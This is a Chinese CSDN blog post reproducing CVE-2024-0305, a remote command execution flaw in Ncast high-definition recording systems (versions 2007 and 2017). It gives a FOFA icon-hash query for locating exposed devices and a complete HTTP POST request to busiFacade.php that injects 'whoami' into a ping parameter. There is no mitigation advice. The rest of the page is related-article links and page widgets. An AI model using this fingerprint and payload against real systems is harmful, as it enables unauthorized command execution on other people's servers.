Ncast盛可视 CVE-2024-0305 远程命令执行漏洞复现

最新推荐文章于 2024-07-08 16:37:01 发布
最新推荐文章于 2024-07-08 16:37:01 发布
阅读量615 收藏 10
点赞数 6
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64366018/article/details/135675075
版权
这篇文章揭示了一起与0x01fofa相关的漏洞,影响了Ncast2007和Ncast2017版本的系统。攻击者通过构造payload在登录页面进行抓包并利用POST请求对busiFacade.php文件发起攻击,可能导致用户数据泄露或系统安全威胁。
摘要由CSDN通过智能技术生成

0x01 fofa语句

icon_hash="-1253433910"

0x02 漏洞影响

Ncast 2007
Ncast 2017

0x03 漏洞利用

登录页面

抓包,构造payload

POST /classes/common/busiFacade.php HTTP/1.1
Host: ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 102
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

{"name":"ping","serviceName":"SysManager","userTransaction":false,"param":["ping 127.0.0.1 | whoami"]}

柯达_
关注
  • 6
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Ncast盈可视 高清智能录播系统 IPSetup.php信息泄露+RCE漏洞复现(CVE-2024-0305)
0xSec
01-10 1342
广州盈科电子技术Ncast盈可视 高清智能录播系统可通过访客身份访问/manage/IPSetup.php后台功能模块,攻击者可以利用该逻辑缺陷查看后台配置信息造成信息泄露,使用网络诊断功能模块可实现未授权远程命令执行,导致服务器失陷被控。
likeshop开源免费商用电商系统存在任意文件上传漏洞CVE-2024-0352
nnn2188185的博客
01-17 321
likeshop开源免费商用电商系统存在任意文件上传漏洞CVE-2024-0352
Ncast盈可视高清智能录播系统busiFacade RCE漏洞(CVE-2024-0305)
Keepb1ue的博客
01-12 925
Ncast盈可视高清智能录播系统是一套新进的音视频录制和播放系统,旨在提供高质量,高清定制的录播功能。
CVE-2024-0569复现及IDS snort防御
2401_82670286的博客
01-29 450
发现了一个被归类为有问题的漏洞,该漏洞存在于Totolink T8 4.1.5cu.833_20220905版本中。该漏洞影响了文件/cgi-bin/cstecgi.cgi中Setting Handler组件的getSysStatusCfg功能。对参数ssid/key的操纵导致信息泄露。攻击者可以远程发起攻击。该漏洞已经公开披露并可能被滥用。升级到版本4.1.5cu.862_B20230228可以解决此问题。建议升级受影响的组件。该漏洞被分配了识别号VDB-250785。
Hack The Box - Redpanda 利用Spring Boot SSTI漏洞获取初始访问权限,Linux系统内核漏洞(CVE-2022-2588)提权,XXE漏洞获取root私钥
Zyu0
12-02 1232
Hack The Box - Redpanda 利用Spring Boot SSTI漏洞获取初始访问权限,Linux系统内核漏洞(CVE-2022-2588)提权,XML外部实体(XXE)注入提权
CVE-2021-32849 Gerapy远程命令执行漏洞复现
include_voidmain的博客
03-09 1203
CVE-2021-32849 Gerapy远程命令执行漏洞复现
NCast:NCast C# SSDP 发现和内容投射 - Google Chromecast
06-14
NCast C# SSDP 发现和内容投射。 目前支持 LG TV 和 Google Chromecast 等渲染器。 public SSDPDiscovery Discovery = new SSDPDiscovery (); // Setup the event when a device is discovered Discovery . ...
Bens software projects.-开源
04-27
我的项目的主页:userinfo,pwmd,libpwmd,cboard,ncast,ezxradio和bubblegum。 还有VIM和EPIC脚本等代码片段。
Ncast_ADPRO6_智能录播解决方案.doc
06-16
Ncast_ADPRO6_智能录播解决方案
单位视频会议扩展方案.doc
09-16
随着信息技术的快速发展,视频会议已成为现代办公的重要组成部分,尤其在远程协作、培训、教育以及企业内部沟通中发挥着至关重要的作用。本方案旨在为单位提供一套智能会议室解决方案,以满足日益增长的视频会议需求...
CVE-2023-21839远程代码执行漏洞
刘家华(游戏开发)
05-01 1536
weblogic CVE-2023-21839、CVE-2023-21931、CVE-2023-21979远程代码执行漏洞复现
Ivanti VPN RCE漏洞复现CVE-2024-21887)
0xSec
01-18 1908
Ivanti Connect Secure (9.x, 22.x) 和Ivanti Policy Secure (9.x, 22.x) 的web组件中存在身份验证绕过漏洞CVE-2023-46805)和命令注入漏洞CVE-2024-21887),成功利用该漏洞链允许远程未经认证的攻击者以root权限执行任意操作系统命令,导致服务器失陷。
CVE-2024-24565:CrateDB数据库任意文件读取漏洞复现 [附POC]
薛定谔嘚喵博客
02-04 351
CrateDB 5.3.9之前、5.4.8之前、5.5.4之前和 5.6.1之前版本存在路径遍历漏洞,该漏洞源于COPY FROM函数存在缺陷,攻击者利用该漏洞可以使用COPY FROM函数将任意文件内容导入到数据库表中,从而导致信息泄露。
复现】D-Tale SSRF漏洞(CVE-2024-21642)_26
fushuang333的博客
01-22 735
复现】D-Tale SSRF漏洞(CVE-2024-21642),可能会进行端口扫描,内网Web应用指纹识别,攻击内网Web应用
亚信安全发布2024年6月威胁态势,高危漏洞猛增60%
亚信安全官方账号的博客
07-04 307
亚信安全发布2024年6月威胁态势
警钟!电池储能安全事故频发!物联网技术如何加强储能安全排查?
最新发布
olzorange的博客
07-08 135
物联网技术的应用为储能安全排查提供了从源头预防到快速响应的全链条解决方案。
【易捷海购-注册安全分析报告】
weixin_46641057的博客
07-05 1139
易捷国际作为中石化易捷旗下专业跨境电商平台,大概是因为和阿里有战略合作层面的关系, 所以在选的不是常见的类似极验、腾讯等滑动拼图类产品, 阿里的产品由于过度重视用户体验, 简单的滑动条特别,模拟器只需要单轴的模拟轨道就可以通过, 说明阿里对轨迹的校验比较宽松,之前的分析显示,阿里主要是靠模拟器识别,如果这道关过了,就没有其它的防护措施了。很多人在短信服务刚开始建设的阶段,可能不会在安全方面考虑太多,理由有很多。比如:“需求这么赶,当然是先实现功能啊”,“业务量很小啦,系统就这么点人用,不怕的。
[终端安全]-5 移动终端之操作系统安全
wendywm0496的博客
07-08 612
每个应用程序运行在一个独立的进程中,通过操作系统的内存管理单元(MMU)实现自己独立的虚拟地址空间,通常从0开始到某个最大值(例如,32位系统上为4GB),这个空间是进程私有的,MMU负责将虚拟地址转换为物理地址。当操作系统在不同进程之间切换时,会切换当前的页表,通过改变MMU中存储的页表基地址(通常存储在寄存器中)来实现,这样进程A和进程B即使使用相同的虚拟地址,也会映射到不同的物理地址。当用户启动应用A时,操作系统会为其创建一个新的进程,该进程由应用A的UID 10001运行;
[图解]SysML和EA建模住宅安全系统-09-流程指南·分析系统需求
rolt的专栏
07-04 876
然后这一步,你看,这里有个决策点
用XDR的思路保护API安全
AKAMAI_CHINA的博客
07-08 696
云计算飞速发展的今天,越来越多应用程序已经转为选择云原生架构,这就少不了Serverless、微服务、API等技术的协助。但同时也有越来越多的企业认识到,一定程度的“API安全”在整体安全与合规态势中发挥着至关重要的作用。然而,对很多企业来说,可能并不太明确API安全技术投资在其更广泛安全栈中的位置。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值